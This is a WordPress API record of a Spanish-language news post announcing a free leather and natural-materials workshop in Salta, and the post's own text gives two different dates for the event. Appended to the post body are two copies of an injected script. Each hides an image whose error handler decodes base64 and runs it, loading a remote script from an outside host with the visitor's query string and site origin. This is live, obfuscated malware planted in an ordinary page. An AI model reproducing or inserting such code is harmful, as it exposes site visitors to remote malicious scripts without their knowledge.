{"id":4561,"date":"2024-11-11T16:03:59","date_gmt":"2024-11-11T19:03:59","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4561"},"modified":"2025-08-13T23:46:02","modified_gmt":"2025-08-14T02:46:02","slug":"taller-de-materiales-naturales-en-el-mercado-artesanal","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4561","title":{"rendered":"Taller de materiales naturales en el Mercado Artesanal"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-b00cdf9229ab8cf3950c42abda25e1b6\" style=\"background-color:#642525\"><em>La Secretar\u00eda de Cultura de Salta y el INTI realizar\u00e1n una capacitaci\u00f3n el 14 de noviembre, de 14 a 18 hs. La invitaci\u00f3n es abierta, p\u00fablica y gratuita, con inscripci\u00f3n previa. Cupos limitados..<\/em><\/h4>\n\n\n\n<p>La&nbsp;<strong>Secretar\u00eda de Cultura de Salta<\/strong>, en conjunto con el Instituto Nacional de Tecnolog\u00eda Industrial (INTI), organiz\u00f3 el taller \u201cEl Cuero Respira\u201d.<\/p>\n\n\n\n<p>El evento, se dictar\u00e1 el pr\u00f3ximo 13 de noviembre, de 14 a 18, en el Sal\u00f3n de Artesan\u00eda, ubicado en San Mart\u00edn 2555, de Salta capital. &nbsp;La capacitaci\u00f3n es gratuita y est\u00e1 dise\u00f1ado para fortalecer las capacidades productivas y los conocimientos en materiales naturales aplicados a la indumentaria y los accesorios.&nbsp;<\/p>\n\n\n\n<p>Est\u00e1 destinado a: emprendedores, artesanos, dise\u00f1adores, fabricantes, cooperativas, docentes y estudiantes de dise\u00f1o. Los asistentes recibir\u00e1n actualizaciones y conocimientos sobre procesos y materiales que impactan en el sector textil y del cuero, permiti\u00e9ndoles mejorar sus t\u00e9cnicas y capacidades productivas.&nbsp;<\/p>\n\n\n\n<p>Las inscripciones se realizan a trav\u00e9s de&nbsp;<a href=\"https:\/\/www.culturasalta.gob.ar\/\">https:\/\/www.culturasalta.gob.ar<\/a>y tienen un cupo limitado.&nbsp;<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Secretar\u00eda de Cultura de Salta y el INTI realizar\u00e1n una capacitaci\u00f3n el 14 de noviembre, de 14 a 18 hs. La invitaci\u00f3n es abierta, p\u00fablica y gratuita, con inscripci\u00f3n previa. Cupos limitados.. La&nbsp;Secretar\u00eda de Cultura de Salta, en conjunto con el Instituto Nacional de Tecnolog\u00eda Industrial (INTI), organiz\u00f3 el taller \u201cEl Cuero Respira\u201d. El [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4562,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[17],"tags":[],"class_list":{"0":"post-4561","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4561"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4561"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4561\/revisions"}],"predecessor-version":[{"id":6645,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4561\/revisions\/6645"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4562"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4561"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4561"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4561"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}